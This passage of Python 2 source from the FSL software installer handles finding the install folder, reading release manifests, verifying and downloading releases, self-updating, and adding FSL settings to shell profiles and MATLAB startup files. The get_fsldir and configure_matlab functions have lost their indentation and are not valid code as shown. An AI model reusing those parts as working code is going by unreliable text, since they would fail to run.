    '''Fetch the FSL release manifest from download_url.

    Uses the JSON manifest when JSON support is available, the CSV
    fallback otherwise.  Memoized per URL.'''
    socket.setdefaulttimeout(timeout)
    MsgUser.debug("Looking for manifest at %s." % (download_url))
    if not HAS_JSON:
        MsgUser.debug("Downloading CSV file")
        return get_csv_dict(download_url + Settings.manifest_csv)
    MsgUser.debug("Downloading JSON file")
    return get_json(download_url + Settings.manifest_json)
class GetFslDirError(Exception):
    '''Raised when a valid FSL install folder cannot be determined.'''
    pass
@memoize
def get_fsldir(specified_dir=None, install=False):
'''Find the installed version of FSL using FSLDIR
or location of this script'''
def validate_fsldir(directory):
parent = os.path.dirname(directory)
if parent == directory:
raise GetFslDirError(
"%s appears to be the root folder" %
parent)
if not os.path.exists(parent):
raise GetFslDirError(
"%s doesn't exist" %
parent)
if not os.path.isdir(parent):
raise GetFslDirError(
"%s isn't a directory" %
parent)
if (os.path.exists(directory) and not
os.path.exists(os.path.join(
directory, 'etc', 'fslversion'
))):
raise GetFslDirError(
"%s exists and doesn't appear to be an installed FSL folder" %
directory)
if specified_dir:
if install is False:
if not check_fsl_install(specified_dir):
raise GetFslDirError(
"%s isn't an 'fsl' folder" %
specified_dir)
else:
validate_fsldir(specified_dir)
return specified_dir
try:
fsldir = os.environ['FSLDIR']
try:
validate_fsldir(fsldir)
except GetFslDirError:
# FSLDIR environment variable is incorrect!
MsgUser.warning('FSLDIR environment variable '
'does not point at FSL install, ignoring...')
MsgUser.debug('FSLDIR is set to %s - '
'this folder does not appear to exist' % (fsldir))
fsldir = None
else:
fsldir = fsldir.rstrip('/')
if MsgUser.isquiet():
return fsldir
except KeyError:
# Look to see if I'm in an FSL install
try:
my_parent = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
except NameError:
# Running in debugger - __file__ not set, assume it's cwd
my_parent = os.path.dirname(
os.path.dirname(os.getcwd()))
try:
validate_fsldir(my_parent)
fsldir = my_parent
except GetFslDirError:
fsldir = None
if not install:
MsgUser.debug("asking about %s" % (fsldir))
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'inst_loc', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.falied(str(e))
return fsldir
else:
if not MsgUser.isquiet():
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'location', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.failed(str(e))
MsgUser.message(
'''Hint - press Enter to select the default value '''
'''given in the square brackets.
If you are specifying a destination folder this needs to either be an existing
FSL install folder or a folder that doesn't already exist.''')
fsldir = None
else:
raise GetFslDirError(
"I can't locate FSL, try again using '-d <FSLDIR>' "
"to specify where to find the FSL install")
return fsldir
def archive_version(archive):
    '''Takes the path to a FSL install file
    and works out what version it is.

    The file name has the form fsl-V.V.V-platform.extensions; raises
    NotAFslVersion when the path is not a file or doesn't parse.'''
    if not os.path.isfile(archive):
        raise NotAFslVersion("%s is not a file" % (archive))
    else:
        # file is of form: fsl-V.V.V-platform.extensions
        # BUG FIX: parse the base name only - a '-' in a parent folder
        # name would previously throw off the split.
        fname = os.path.basename(archive.strip())
        (_, vstring, _) = fname.split('-', 2)
        try:
            return Version(vstring)
        except ValueError:
            raise NotAFslVersion(
                "%s doesn't look like "
                "a version number" % (vstring))
class NotAFslVersion(Exception):
    '''Raised when a string/file does not describe an FSL version.'''
    pass
class GetInstalledVersionError(Exception):
    '''Raised when the installed FSL version cannot be read.'''
    pass
def get_installed_version(fsldir):
    '''Takes path to FSLDIR and finds installed version details.

    Reads <fsldir>/etc/fslversion; raises NotAFslVersion when the
    content doesn't parse and GetInstalledVersionError when the file
    is missing.'''
    MsgUser.debug("Looking for fsl in %s" % fsldir)
    v_file = os.path.join(fsldir, 'etc', 'fslversion')
    if os.path.exists(v_file):
        f = open(v_file)
        v_string = f.readline()
        f.close()
        try:
            version = Version(v_string.strip())
        except ValueError:
            raise NotAFslVersion(
                "%s not a valid "
                "version string" % (v_string.strip()))
    else:
        MsgUser.debug(
            "No version information found - "
            "is this actually an FSL dir?")
        raise GetInstalledVersionError(
            "Cannot find the version information - "
            "is this actually an FSL dir?")
    MsgUser.debug("Found version %s" % (version))
    return version
def which_shell():
    '''Name of the user's login shell, taken from $SHELL (e.g. "bash").'''
    shell_path = os.getenv("SHELL")
    return os.path.basename(shell_path)
class SelfUpdateError(Exception):
    '''Raised when the installer cannot update itself.'''
    pass
def self_update(server_url):
    '''Check for and apply an update to myself.

    When the server advertises a newer installer it is downloaded,
    checksum-verified and re-executed with our original arguments via
    os.execv (so this function does not return on that path).  When
    argv[0] is not 'fslinstaller' we are the re-executed copy and just
    report success.'''
    # See if there is a newer version available
    if 'fslinstaller' in sys.argv[0]:
        try:
            installer = get_installer(server_url)
        except GetInstallerError, e:
            MsgUser.debug("Failed to get installer version %s." % (str(e)))
            raise SelfUpdateError('Failed to get installer version. '
                                  'Please try again later.')
        MsgUser.debug("Server has version " + installer['version'])
        if Version(installer['version']) <= version:
            MsgUser.debug("Installer is up-to-date.")
            return
        # There is a new version available - download it
        MsgUser.message("There is a newer version (%s) of the installer "
                        "(you have %s) updating..." % (
                            installer['version'], version))
        (_, tmpfname) = temp_file_name(mode='w', close=True)
        downloaded = False
        while downloaded is False:
            try:
                file_url = '/'.join(
                    (Settings.mirror.rstrip('/'), installer['filename']))
                download_file(
                    url=file_url,
                    localf=tmpfname)
                if (
                        file_checksum(tmpfname, installer['checksum_type']) !=
                        installer['checksum']):
                    raise SelfUpdateError(
                        "Found update to installer but download "
                        "was corrupt. Please try again later.")
            except DownloadFileError, e:
                # Mirror failed: fall back to the main site once
                if Settings.mirror != Settings.main_mirror:
                    MsgUser.warning(
                        "Download from mirror failed, re-trying from "
                        "main FSL download site")
                    Settings.mirror = Settings.main_mirror
                else:
                    MsgUser.debug("Failed to update installer %s." % (str(e)))
                    raise SelfUpdateError(
                        'Found update to installer but unable to '
                        'download the new version. Please try again.')
            else:
                downloaded = True
        # Now run the new installer
        # EXEC new script with the options we were given
        os.chmod(tmpfname, 0755)
        c_args = [sys.executable, tmpfname, ]
        c_args.extend(sys.argv[1:])
        MsgUser.debug(
            "Calling %s %s" % (sys.executable, c_args))
        os.execv(sys.executable, c_args)
    else:
        # We are now running the newly downloaded installer
        MsgUser.ok('Installer updated to latest version %s' % (str(version)))
        MsgUser.ok("Installer self update successful.")
class ServerFailure(Exception):
    '''Raised when the download servers misbehave or are unreachable.'''
    pass
class BadVersion(Exception):
    '''Raised when a requested version cannot be interpreted or found.'''
    pass
class GetInstallerError(Exception):
    '''Raised when installer metadata cannot be fetched.'''
    pass
def get_installer(server_url):
    '''Return the 'installer' entry of the web manifest at server_url.'''
    MsgUser.debug("Checking %s for "
                  "installer information" % (server_url))
    return get_web_manifest(server_url)['installer']
@memoize
def get_releases(server_url):
    '''Return a hash with all information about available
    versions for this OS.

    Resolves vendor aliases (e.g. rhel -> centos) and walks downwards
    from our OS major version until a supported entry is found; raises
    UnsupportedOs when nothing matches.'''
    computer = Host
    MsgUser.debug("Getting web manifest")
    manifest = get_web_manifest(server_url)
    try:
        os_definition = manifest[computer.o_s][computer.vendor]
    except KeyError:
        raise UnsupportedOs("%s %s not supported by this installer" % (
            computer.o_s, computer.vendor
        ))
    t_version = computer.version.major
    alias_t = 'alias'
    # Follow a vendor alias (e.g. rhel -> centos) for our major version
    if alias_t in os_definition.keys():
        if str(t_version) in os_definition[alias_t]:
            os_parent = os_definition[alias_t][
                str(t_version)]['parent']
            os_definition = manifest[computer.o_s][os_parent]
    if computer.arch not in os_definition.keys():
        raise UnsupportedOs("%s %s not supported" % (
            computer.vendor,
            computer.arch
        ))
    os_def = os_definition[computer.arch]
    # Step down through earlier OS major versions until one is found
    while t_version > 0:
        MsgUser.debug("Trying version %s" % (t_version))
        if str(t_version) not in os_def.keys():
            MsgUser.debug("...not found")
            t_version -= 1
        else:
            break
    if t_version == 0:
        raise UnsupportedOs("%s %s not supported" % (
            computer.vendor,
            computer.version.major
        ))
    elif t_version != computer.version.major:
        MsgUser.warning(
            "%s %s not officially supported "
            "- trying to locate support for an earlier "
            "version - this may not work" % (
                computer.vendor, computer.version.major))
    return os_definition[computer.arch][str(t_version)]
class ExtraDownloadError(Exception):
    '''Raised when an optional extra (e.g. sources) is unavailable.'''
    pass
@memoize
def get_extra(server_url, extra_type):
    '''Return the manifest entry for extra_type (e.g. source bundles);
    raises ExtraDownloadError for unrecognised types.'''
    MsgUser.debug("Getting web manifest")
    manifest = get_web_manifest(server_url)
    if extra_type not in manifest:
        raise ExtraDownloadError("Unrecognised extra %s" % (extra_type))
    return manifest[extra_type]
class ImproperlyConfigured(Exception):
    '''Raised when the installer configuration is inconsistent.'''
    pass
def list_releases(url):
    '''Print every FSL version available for this OS.'''
    releases = get_releases(url)
    MsgUser.message("Available FSL versions for this OS:")
    MsgUser.debug(releases)
    for ver, info in releases.items():
        rdate = info.get('date', "Third-party package")
        MsgUser.message("%s\t(%s)" % (ver, rdate))
def latest_release(url):
    '''Return the release entry carrying the highest version number.'''
    releases = get_releases(url)
    MsgUser.debug("Got version information: %s" % (releases))
    versions = [Version(v) for v in releases.keys()]
    MsgUser.debug("Versions: %s" % (versions))
    newest = sorted(versions)[-1]
    return releases[str(newest)]
class InstallInstallerError(Exception):
    '''Raised when this script cannot be copied into $FSLDIR/etc.'''
    pass
def install_installer(fsldir):
    '''Install this script into $FSLDIR/etc'''
    targetfolder = os.path.join(fsldir, 'etc')
    installer = os.path.abspath(__file__)
    MsgUser.debug(
        "Copying fslinstaller (%s) to %s" % (
            installer,
            targetfolder))
    as_root = False
    if not is_writeable(targetfolder):
        # Fall back to sudo; bail out if even root cannot write there
        if not is_writeable_as_root(targetfolder):
            raise InstallInstallerError("Cannot write to folder as root user.")
        as_root = True
    copy_file(
        installer, os.path.join(targetfolder, "fslinstaller.py"),
        as_root)
class InstallQuestions(object):
    '''Registry of the interactive questions the installer can ask.

    Questions are registered with add_question and asked with
    ask_question; questions of type 'bool' parse yes/no answers into
    booleans.  Setting self.defaults = True makes every question answer
    itself with its default (recorded in self.answers).'''
    def __init__(self):
        self.questions = {}
        self.validators = {}
        self.type = {}
        self.default = {}
        # BUG FIX: self.answers was never initialised, so ask_question
        # raised AttributeError the first time defaults mode was used.
        self.answers = {}
        self.defaults = False
    def add_question(self, key, question, default, qtype, validation_f):
        '''Register a question under key with its default, type and
        validator callable.'''
        self.questions[key] = question
        self.default[key] = default
        self.type[key] = qtype
        self.validators[key] = validation_f
    def ask_question(self, key, default=None):
        '''Ask (or auto-answer) the question registered under key and
        return the validated, parsed answer.'''
        # Ask a question
        no_answer = True
        validator = self.validators[key]
        def parse_answer(q_type, answer):
            # 'bool' questions map "yes" to True and anything else to False
            if q_type == 'bool':
                if answer.lower() == 'yes':
                    return True
                else:
                    return False
            else:
                return answer
        if not default:
            default = self.default[key]
        if self.defaults:
            MsgUser.debug(self.questions[key])
            MsgUser.debug("Automatically using the default %s" % (default))
            # BUG FIX: also bind the local 'answer' - previously only
            # self.answers was set, so the return below raised NameError.
            answer = self.answers[key] = parse_answer(self.type[key], default)
            no_answer = False
        while no_answer:
            MsgUser.question(
                "%s? %s:" % (
                    self.questions[key],
                    '[%s]' % (default)))
            your_answer = raw_input()
            MsgUser.debug("Your answer was %s" % (your_answer))
            if your_answer == '':
                MsgUser.debug("You want the default")
                your_answer = default
            if validator(your_answer):
                answer = parse_answer(self.type[key], your_answer)
                no_answer = False
        MsgUser.debug("Returning the answer %s" % (answer))
        return answer
def yes_no(answer):
    '''Validator: accept only "yes" or "no" (case-insensitive).'''
    lowered = answer.lower()
    if lowered in ('yes', 'no'):
        return True
    MsgUser.message("Please enter yes or no.")
    return False
def check_install_location(folder):
    '''Don't allow relative paths'''
    MsgUser.debug("Checking %s is an absolute path" % (folder))
    looks_relative = folder in ('.', '..')
    for prefix in ('./', '../', '~'):
        if folder.startswith(prefix):
            looks_relative = True
    if looks_relative:
        MsgUser.message("Please enter an absolute path.")
        return False
    return True
def external_validate(what_to_check):
    '''Always-true validator; the real validation happens elsewhere.'''
    return True
def check_fsl_install(fsldir):
    '''Check if this folder contains FSL install'''
    MsgUser.debug("Checking %s is an FSL install" % (fsldir))
    marker = os.path.join(fsldir, 'etc', 'fslversion')
    return os.path.isdir(fsldir) and os.path.exists(marker)
def fsl_downloadname(suffix, version):
    '''Build the canonical download file name "fsl-<version>-<suffix>".'''
    return 'fsl-%s-%s' % (version, suffix)
class Settings(object):
    # Central installer configuration: banner, download servers,
    # platform-specific data and the registry of interactive questions.
    version = version  # installer version string (module-level global)
    title = "--- FSL Installer - Version %s ---" % (version)
    main_server = 'fsl.fmrib.ox.ac.uk'
    # Known mirrors; currently only the main FSL site over https.
    mirrors = [build_url_with_protocol('https',
                                       main_server, ('fsldownloads',
                                                     '')), ]
    mirrors_file = 'fslmirrorlist.txt'  # server-side list of mirrors
    manifest_json = 'manifest.json'
    manifest_csv = 'manifest.csv'
    main_mirror = mirrors[0]
    mirror = main_mirror  # active mirror; may be switched at runtime
    # macOS application bundles that get linked into /Applications
    applications = ['bin/fslview.app', 'bin/assistant.app']
    # X11 detection data used on macOS (see check_X11)
    x11 = {'bad_versions': [],
           'download_url': "http://xquartz.macosforge.org/landing/",
           'apps': ['XQuartz.app', 'X11.app', ],
           'location': "/Applications/Utilities"}
    default_location = '/usr/local/fsl'
    post_inst_dir = "etc/fslconf"
    # Interactive questions asked at various points of the install.
    inst_qus = InstallQuestions()
    inst_qus.add_question('version_match',
                          "The requested version matches the installed "
                          "version - do you wish to re-install FSL",
                          'no', 'bool', yes_no)
    inst_qus.add_question('location',
                          "Where would you like the FSL install to be "
                          "(including the FSL folder name)",
                          default_location, 'path', check_install_location)
    inst_qus.add_question('del_old',
                          "FSL exists in the current location, "
                          "would you like to keep a backup of the old "
                          "version (N.B. You will not be able to use the old "
                          "version)",
                          'no', 'bool', yes_no)
    inst_qus.add_question('create',
                          "Install location doesn't exist, should I create it",
                          'yes', 'bool', yes_no)
    inst_qus.add_question('inst_loc',
                          "Where is the FSL folder (e.g. /usr/local/fsl)",
                          default_location, 'path', check_fsl_install)
    inst_qus.add_question('skipmd5',
                          "I was unable to download the checksum of "
                          "the install file so cannot confirm it is correct. "
                          "Would you like to install anyway",
                          'no', 'bool', yes_no)
    inst_qus.add_question('overwrite',
                          "There is already a local copy of the file, would "
                          "you like to overwrite it",
                          "yes", 'bool', yes_no)
    inst_qus.add_question('upgrade',
                          "Would you like to install upgrade",
                          "yes", 'bool', yes_no)
    inst_qus.add_question('update',
                          "Would you like to install update",
                          "yes", 'bool', yes_no)
def get_json(web_url):
    """Fetch *web_url* and parse the response body as JSON.

    Raises ServerFailure if the URL cannot be opened.
    """
    MsgUser.debug("Opening "+web_url)
    try:
        url = open_url(web_url)
        return json.load(url)
    except OpenUrlError, e:
        raise ServerFailure(str(e))
# [ linux, centos, x86_64, 6, filename, 'fname',
# version, 'version', date, 'date', checksum_type, 'checksum_type',
# checksum, 'checksum', supported, 'true/false', notes, 'notes',
# instructions, 'instructions']
# [ linux, redhat, alias, centos, supported, True/false, version, 'version' ]
# [ 'installer', filename, 'fname', version, 'version', date, 'date',
# checksum_type, 'checksum_type', checksum, 'checksum', supported,
# 'true/false', notes, 'notes', instructions, 'instructions']
# [ feeds, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
# [ sources, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
class AutoDict(dict):
    '''A dict that transparently creates nested AutoDicts on missing keys,
    allowing deep assignment such as d[a][b][c] = value.'''

    def __getitem__(self, key):
        # Create-on-miss: a missing key is populated with a fresh
        # AutoDict before being returned.
        if key not in self:
            self[key] = type(self)()
        return dict.__getitem__(self, key)

    def freeze(self):
        '''Return a plain-dict deep copy of this AutoDict.'''
        return dict(
            (k, v.freeze() if type(v) == type(self) else v)
            for k, v in self.items())
def get_csv_dict(web_url):
    """Download and parse the CSV manifest at *web_url* into a nested dict.

    Each CSV row is a flat list of alternating keys and values after a
    row-type prefix (see the format comments above this function).
    Returns a plain nested dict (AutoDict.freeze()).
    Raises ServerFailure if the URL cannot be opened.
    """
    MsgUser.debug("Opening "+web_url)
    try:
        url = open_url(web_url)
        manifest_reader = csv.reader(
            url, delimiter=',', quoting=csv.QUOTE_MINIMAL)
        a_dict = AutoDict()
        for line in manifest_reader:
            MsgUser.debug(line)
            if line[0] == 'feeds':
                # Single-level entry: pair up the remaining fields
                items = iter(line[1:])
                base_dict = dict(zip(items, items))
                a_dict[line[0]] = base_dict
            elif line[0] == 'sources':
                items = iter(line[1:])
                base_dict = dict(zip(items, items))
                a_dict[line[0]] = base_dict
            elif line[0] == 'installer':
                items = iter(line[1:])
                base_dict = dict(zip(items, items))
                a_dict[line[0]] = base_dict
            else:
                # Install package or alias
                if line[2] == 'alias':
                    # Keyed by os / distribution / 'alias' / alias-name
                    items = iter(line[4:])
                    base_dict = dict(zip(items, items))
                    a_dict[
                        str(line[0])][
                        str(line[1])][
                        str(line[2])][
                        str(line[3])] = base_dict
                else:
                    # Keyed by os / distribution / arch / version / extra
                    items = iter(line[5:])
                    base_dict = dict(zip(items, items))
                    MsgUser.debug(
                        ",".join(
                            (line[0], line[1], line[2], line[3], line[4])))
                    a_dict[
                        str(line[0])][
                        str(line[1])][
                        str(line[2])][
                        str(line[3])][
                        str(line[4])] = base_dict
    except OpenUrlError, e:
        raise ServerFailure(str(e))
    MsgUser.debug(a_dict)
    return a_dict.freeze()
class InvalidVersion(Exception):
    """Raised when a version string cannot be interpreted."""
def get_web_version_and_details(
        server_url=Settings.mirror,
        request_version=None):
    """Return (Version, details-dict) for the latest or a requested release.

    NOTE(review): the default server_url binds Settings.mirror at
    definition time, so later changes to Settings.mirror do not change
    this default - callers pass server_url explicitly when it matters.
    Raises DownloadError when no usable release can be identified.
    """
    if request_version is None:
        details = latest_release(server_url)
        try:
            version = Version(details['version'])
        except KeyError:
            # No 'version' key: the server may instead supply a
            # 'redirect' URL with manual download instructions.
            try:
                redirect = details['redirect']
                raise DownloadError(
                    "Installer not supported on this platform."
                    "Please visit %s for download instructions" % redirect)
            except KeyError:
                MsgUser.debug(
                    "Can't find version or redirect - %s" % details)
                raise DownloadError(
                    "Unsupported OS"
                )
    else:
        MsgUser.debug("Requested version %s" % request_version)
        releases = get_releases(server_url)
        try:
            version = Version(request_version)
        except ValueError:
            raise DownloadError(
                "%s doesn't look like a version" % request_version)
        if request_version not in releases.keys():
            raise DownloadError(
                "%s isn't an available version" % request_version)
        details = releases[request_version]
    return (version, details)
def download_release(
        server_url=Settings.mirror, to_temp=False,
        request_version=None, skip_verify=False,
        keep=False, source_code=False, feeds=False):
    """Download an FSL release (or its source code / FEEDS archive).

    to_temp -- download to a temporary file instead of the manifest name.
    skip_verify -- skip the checksum comparison after download.
    source_code / feeds -- download the companion archive instead of the
    binary release (forces to_temp off).
    Returns (local_filename, version, details).  Raises DownloadError on
    any failure.
    """
    (version, details) = get_web_version_and_details(
        server_url, request_version)
    if request_version is None:
        request_version = str(version)
    if source_code or feeds:
        if source_code:
            extra_type = 'sources'
            MsgUser.message("Downloading source code")
        else:
            extra_type = 'feeds'
            MsgUser.message("Downloading FEEDS")
        try:
            releases = get_extra(server_url, extra_type)
        except ExtraDownloadError, e:
            raise DownloadError(
                "Unable to find details for %s" % (extra_type)
            )
        # Companion archives always go to a named local file
        to_temp = False
        try:
            details = releases[request_version]
        except KeyError:
            raise DownloadError(
                "%s %s isn't available" % (request_version, extra_type)
            )
    MsgUser.debug(details)
    if to_temp:
        try:
            (_, local_filename) = temp_file_name(close=True)
        except Exception, e:
            MsgUser.debug("Error getting temporary file name %s" % (str(e)))
            raise DownloadError("Unable to begin download")
    else:
        local_filename = details['filename']
        if os.path.exists(local_filename):
            if os.path.isfile(local_filename):
                # Ask before clobbering an existing download
                MsgUser.message("%s exists" % (local_filename))
                overwrite = Settings.inst_qus.ask_question('overwrite')
                if overwrite:
                    MsgUser.warning(
                        "Erasing existing file %s" % local_filename)
                    try:
                        os.remove(local_filename)
                    except Exception:
                        raise DownloadError(
                            "Unabled to remove local file %s - remove"
                            " it and try again" % local_filename)
                else:
                    raise DownloadError("Aborting download")
            else:
                raise DownloadError(
                    "There is a directory named %s "
                    "- cannot overwrite" % local_filename)
    MsgUser.debug(
        "Downloading to file %s "
        "(this may take some time)." % (local_filename))
    MsgUser.message(
        "Downloading...")
    # Retry loop: on mirror failure, fall back once to the main site.
    downloaded = False
    while downloaded is False:
        try:
            file_url = '/'.join(
                (Settings.mirror.rstrip('/'), details['filename']))
            download_file(
                url=file_url,
                localf=local_filename)
            if (not skip_verify and
                    (details['checksum'] !=
                     file_checksum(local_filename, details['checksum_type']))):
                raise DownloadError('Downloaded file fails checksum')
            MsgUser.ok("File downloaded")
        except DownloadFileError, e:
            MsgUser.debug(str(e))
            if Settings.mirror != Settings.main_mirror:
                MsgUser.warning(
                    "Download from mirror failed, re-trying from "
                    "main FSL download site")
                Settings.mirror = Settings.main_mirror
            else:
                raise DownloadError(str(e))
        else:
            downloaded = True
    return (local_filename, version, details)
class DownloadError(Exception):
    """Raised when an FSL release or companion download fails."""
def shell_config(shell, fsldir, skip_root=False):
    """Build the FSL environment stanza for a given shell.

    Returns a tuple (env_lines, match, replace): env_lines is the text
    to append to a profile (fsldir substituted in), match is the line
    prefix used to locate an existing FSLDIR setting, and replace is the
    replacement line for it.  skip_root wraps the stanza so it is not
    applied for the root user.  Raises ValueError for unknown shells.
    """
    MsgUser.debug("Building environment for %s" % (shell))
    env_lines = ''
    if shell in BOURNE_SHELLS:
        if skip_root:
            # Guard: leave root's environment untouched
            env_lines += '''if [ -x /usr/bin/id ]; then
if [ -z "$EUID" ]; then
# ksh and dash doesn't setup the EUID environment var
EUID=`id -u`
fi
fi
if [ "$EUID" != "0" ]; then
'''
        env_lines += '''
# FSL Setup
FSLDIR=%s
PATH=${FSLDIR}/bin:${PATH}
export FSLDIR PATH
. ${FSLDIR}/etc/fslconf/fsl.sh
'''
        if skip_root:
            env_lines += '''fi'''
        match = "FSLDIR="
        replace = "FSLDIR=%s"
    elif shell in C_SHELLS:
        if skip_root:
            env_lines += '''if ( $uid != 0 ) then
'''
        env_lines += '''
# FSL Setup
setenv FSLDIR %s
setenv PATH ${FSLDIR}/bin:${PATH}
source ${FSLDIR}/etc/fslconf/fsl.csh
'''
        if skip_root:
            env_lines += '''
endif'''
        match = "setenv FSLDIR"
        replace = "setenv FSLDIR %s"
    elif shell == 'matlab':
        # %% is a literal percent in the final string
        env_lines = '''
%% FSL Setup
setenv( 'FSLDIR', '%s' );
fsldir = getenv('FSLDIR');
fsldirmpath = sprintf('%%s/etc/matlab',fsldir);
path(path, fsldirmpath);
clear fsldir fsldirmpath;
'''
        match = "setenv( 'FSLDIR',"
        replace = "setenv( 'FSLDIR', '%s' );"
    else:
        raise ValueError("Unknown shell type %s" % shell)
    return (env_lines % (fsldir), match, replace % (fsldir))
def get_profile(shell):
    """Return the path of the startup file to edit for *shell*.

    Falls back to ~/.profile (bash) or ~/.cshrc (tcsh) when the
    shell-specific file is absent but the fallback exists.
    Raises ValueError for unsupported shells.
    """
    home = os.path.expanduser("~")
    dotprofile = os.path.join(home, '.profile')
    if shell == 'bash':
        candidate = os.path.join(home, '.bash_profile')
        if os.path.isfile(candidate) or not os.path.isfile(dotprofile):
            return candidate
        return dotprofile
    if shell == 'zsh':
        # ZSH will never source .profile
        return os.path.join(home, '.zprofile')
    if shell == 'sh':
        return dotprofile
    cshprofile = os.path.join(home, '.cshrc')
    if shell == 'csh':
        return cshprofile
    if shell == 'tcsh':
        candidate = os.path.join(home, '.tcshrc')
        if os.path.isfile(candidate) or not os.path.isfile(cshprofile):
            return candidate
        return cshprofile
    raise ValueError("Unsupported shell")
class FixFslDirError(Exception):
    """Raised when an existing FSLDIR entry in a profile cannot be fixed."""
def fix_fsldir(shell, fsldir):
    """Rewrite the FSLDIR line in the user's shell profile to *fsldir*.

    Raises FixFslDirError if the profile cannot be edited.
    """
    (_, match, replace) = shell_config(shell, fsldir)
    profile = get_profile(shell)
    MsgUser.debug(
        "Editing %s, replacing line beginning:%s with %s." %
        (profile, match, replace))
    try:
        edit_file(profile, line_starts_replace, match, replace, False)
    except EditFileError, e:
        raise FixFslDirError(str(e))
class AddFslDirError(Exception):
    """Raised when the FSL stanza cannot be appended to a profile."""
def add_fsldir(shell, fsldir):
    """Append the FSL environment stanza for *fsldir* to the user's profile.

    Raises AddFslDirError if the profile cannot be written.
    """
    (env_lines, _, _) = shell_config(shell, fsldir)
    profile = get_profile(shell)
    MsgUser.debug("Adding %s to %s" % (env_lines, profile))
    try:
        add_to_file(profile, env_lines, False)
    except AddToFileError, e:
        raise AddFslDirError(str(e))
class ConfigureMatlabError(Exception):
    """Raised when MATLAB's startup.m cannot be created or updated."""
class ConfigureMatlabWarn(Exception):
    """Non-fatal: MATLAB does not appear to be installed."""
def configure_matlab(fsldir, m_startup='', c_file=True):
'''Setup your startup.m file to enable FSL MATLAB functions to work'''
(mlines, match, replace) = shell_config('matlab', fsldir)
if m_startup == '':
m_startup = os.path.join(
os.path.expanduser('~'), 'matlab', 'startup.m')
if os.path.exists(m_startup):
# Check if already configured
MsgUser.debug("Looking for %s in %s" % (match, m_startup))
if file_contains(m_startup, match):
try:
MsgUser.debug('Updating MATLAB startup file.')
edit_file(
m_startup, line_starts_replace,
match, replace, False)
except EditFileError, e:
raise ConfigureMatlabError(str(e))
else:
MsgUser.debug('Adding FSL settings to MATLAB.')
try:
add_to_file(m_startup, mlines, False)
except AddToFileError, e:
raise ConfigureMatlabError(str(e))
elif c_file:
# No startup.m file found. Create one
try:
MsgUser.debug('No MATLAB startup.m file found, creating one.')
if not os.path.isdir(os.path.dirname(m_startup)):
MsgUser.debug('No MATLAB startup.m file found, creating one.')
os.mkdir(os.path.dirname(m_startup))
create_file(m_startup, mlines, False)
except (OSError, CreateFileError), e:
MsgUser.debug(
'Unable to create ~/matlab folder or startup.m file,'
' cannot configure (%).' % (str(e)))
raise ConfigureMatlabError(
"Unable to create your ~/matlab folder or startup.m, "
"so cannot configure MATLAB for FSL.")
else:
MsgUser.debug('MATLAB may not be installed, doing nothing.')
raise ConfigureMatlabWarn("I can't tell if you have MATLAB installed.")
class SetupEnvironmentError(Exception):
    """Raised when shell environment configuration fails."""
class SetupEnvironmentSkip(Exception):
    """Non-fatal: some shells were already configured and were skipped."""
def setup_system_environment(fsldir):
    '''Add a system-wide profile setting up FSL for all users.
    Only supported on Redhat/Centos (requires /etc/profile.d).

    Raises SetupEnvironmentError on failure, SetupEnvironmentSkip when
    every file was already configured.
    '''
    profile_d = '/etc/profile.d'
    profile_files = ['fsl.sh', 'fsl.csh']
    exceptions = []   # accumulated error strings
    skips = []        # profiles already up to date
    # Editing /etc/profile.d needs root unless we already are root
    if os.getuid() != 0:
        sudo = True
    else:
        sudo = False
    if os.path.isdir(profile_d):
        for profile in profile_files:
            # 'fsl.sh' -> 'sh', 'fsl.csh' -> 'csh'
            pf = profile.split('.')[1]
            (lines, match, replace) = shell_config(pf, fsldir)
            this_profile = os.path.join(profile_d, profile)
            if os.path.exists(this_profile):
                # Already has a profile file
                # Does it contain an exact match for current FSLDIR?
                # (note: 'match' is reused here to hold the found line)
                match = file_contains_1stline(this_profile, replace)
                if match != '':
                    # If there is an fsl.(c)sh then just fix
                    # the entry for FSLDIR
                    MsgUser.debug(
                        "Fixing %s for FSLDIR location." % (this_profile))
                    try:
                        edit_file(
                            this_profile, line_starts_replace,
                            match, replace, sudo)
                    except EditFileError, e:
                        exceptions.append(str(e))
                else:
                    # No need to do anything
                    MsgUser.debug(
                        "%s already configured - skipping." %
                        (this_profile))
                    skips.append(profile)
            else:
                # Create the file
                try:
                    create_file(this_profile, lines, sudo)
                except CreateFileError, e:
                    exceptions.append(str(e))
    else:
        raise SetupEnvironmentError(
            "No system-wide configuration folder found - Skipped")
    if exceptions:
        raise SetupEnvironmentError(".".join(exceptions))
    if skips:
        raise SetupEnvironmentSkip(".".join(skips))
def setup_environment(fsldir=None, system=False, with_matlab=False):
    '''Setup the user's environment so that their
    terminal finds the FSL tools etc.

    Creates or updates the user's shell profile and, optionally, their
    MATLAB startup.m.  Raises SetupEnvironmentError on failure.
    NOTE(review): the 'system' parameter is accepted but never used here
    - system-wide setup goes through setup_system_environment instead.
    '''
    # Check for presence of profile file:
    if fsldir is None:
        fsldir = get_fsldir()
    user_shell = which_shell()
    MsgUser.debug("User's shell is %s" % (user_shell))
    try:
        (profile_lines, _, _) = shell_config(user_shell, fsldir)
        profile = get_profile(user_shell)
    except ValueError, e:
        raise SetupEnvironmentError(str(e))
    cfile = False
    if not os.path.isfile(profile):
        MsgUser.debug("User is missing a shell setup file.")
        cfile = True
    if cfile:
        MsgUser.debug("Creating file %s" % (profile))
        try:
            create_file(profile, profile_lines, False)
        except CreateFileError, e:
            raise SetupEnvironmentError(
                "Unable to create profile %s" % (profile))
    else:
        # Check if user already has FSLDIR set
        MsgUser.message("Setting up FSL software...")
        try:
            if file_contains(profile, "FSLDIR"):
                MsgUser.debug("Updating FSLDIR entry.")
                fix_fsldir(user_shell, fsldir)
            else:
                MsgUser.debug("Adding FSLDIR entry.")
                add_fsldir(user_shell, fsldir)
        except (AddFslDirError, FixFslDirError), e:
            raise SetupEnvironmentError(
                "Unable to update your profile %s"
                " with FSL settings" % (profile))
    if with_matlab:
